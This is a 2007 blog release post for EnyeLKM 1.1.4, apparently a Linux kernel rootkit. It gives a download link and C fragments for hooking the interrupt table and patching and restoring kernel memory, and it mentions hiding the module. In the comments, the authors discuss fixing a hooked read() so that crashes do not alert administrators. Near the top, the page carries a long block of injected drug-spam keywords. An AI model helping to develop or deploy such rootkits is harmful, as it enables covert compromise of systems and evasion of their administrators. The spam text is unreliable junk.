« EnyeLKM 1.1.3
EnyeLKM 1.1.4-fix »

EnyeLKM 1.1.4

Language / Lenguaje:
Testerone Hgh Medical Atrovent Anxiety Byetta Lisinopril Interaction Migraine And Depakote Flatulence Glucophage La Piazza Allegra Hamilton Ontario Is There Ibuprofen In Cafergot Hoodia Gardonia Effect Blood Pressure Headaches And Prozac Next Day Cialis Prozac Causes Parkinsons Disease Imitrex And Alcohol Lipitor Versus Levostatin Fda Approval For Risperdal 1993 Tramadol Acet D Cup Breast Augmentation Faxine Effexor Dysfunction Erectile Levitra Femara As Fertility Drug Bacteria Producing Chitosan Using Crabshell Ultram End Of Dose Prednisone And Hyperglycemia Erectile Dysfunction And Lipitor Viagra Coverage Ca Dilantin Levels In Blood Interactions Symptoms Of Celexa And Biaxin Colchicine Overdose Effects Elavil Used In Suicide Fosamax Joint And Muscle Pain Zoloft Sertraline Tablets Getting Off Effexor Xr Cialis Buy It Online Huge Discount Clomid Affects Hcg Levels Aciphex Directions Reasons Why Viagra Would Be Ineffective Medical Research For Levitra Relafen Neuropathy Norvasc And Peripheral Edema Levoquin And Coumadin What To Eat When Taking Coumadin Prolong Use Of Lexapro Hoodia And Medicine Interactions Ultram Tramadol Hci Tablet Zocor Cost Per Pill Effects Of Levitra On Women Viagra Sale Cheap Colchicine Gout Colchicine Treatment Gout Actos Takeda Pharm Lasix Symtoms Lioresal Prescribing Information

http://www.fr33project.org/projects/enyelkm-1.1.4.rar

New module: restore_memory.c, The module is capable of saving the overwritten memory by the jumps to restore them later when the module loads (before it was not possible to load it).

create_push_ret( & push_ret, (unsigned long) new_idt );
save_memory( (unsigned long) p, & backup_memory );
write_push_ret( ( void *) p, & push_ret );

LKM’s cleanup function:
restore_memory( & backup_memory );
__dev_remove_pack( & my_pkt );
/* let processes that are ‘reading’ finish*/
while ( read_activo != 0 || can_unload_lkm != 1 )
schedule();

Modification at idt:
void new_idt( void )
{
can_unload_lkm = 0;
….
can_unload_lkm = 1;
JmPushRet( after_call )

The traffic light is used just in case any redirected system calls are being executed.
P.D.: To try it comment the function hide_module().

Posted by David Reguera Garcia

This entry was posted on Friday, March 23rd, 2007 at 4.09 pm and is filed under release. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

3 Responses to “EnyeLKM 1.1.4”

  1. RaiSe Says:
    2007-03-23 at 5.21 pm

    Language / Lenguaje: Spanish / Español

    Hi. As I told you through msn there is a mess done by me at the hacked_read(), the semaphore read_activo it can not be a binary one, as my OS teacher would say there is a clear problem of mutual exclusion XD. read_activo has to be an initialized counter set to 0, when a process enters a read it increases it, and when exiting it decreases it, like it is now a process could be inside its blocked read and read_activo to 0 easily. If possible for read_activo to be better of atomic_t type to avoid mutual exclusion problems and make it look more cool :). Apart from that, the load/unload is perfect, the only failure is that a process could be bloqued inside our hacked_read() and with read_activo set to 0, the module unloads and when pressing intro (bash) for example, gets unblocked, its eip gets restored that was in our hacked_read() that does not exist anymore, gives a page missing error and the process crashes leaving a long list of messages at the syslog that any of the most absent minded administrators would notice haha. Greetings ;).

  2. David Reguera Garcia Says:
    2007-03-23 at 9.15 pm

    Language / Lenguaje: Spanish / Español

    Well anyway, the unload is only for you and me, a priori LKM does not normally unload, in any case, could you paste your hacked_read? or shall I implement it? :?

  3. David Reguera Garcia Says:
    2007-03-24 at 8.08 am

    Language / Lenguaje: Spanish / Español

    I have allready implemented it :-), take a look at 1.1.4-fix :-).

Leave a Reply

You must be logged in to post a comment.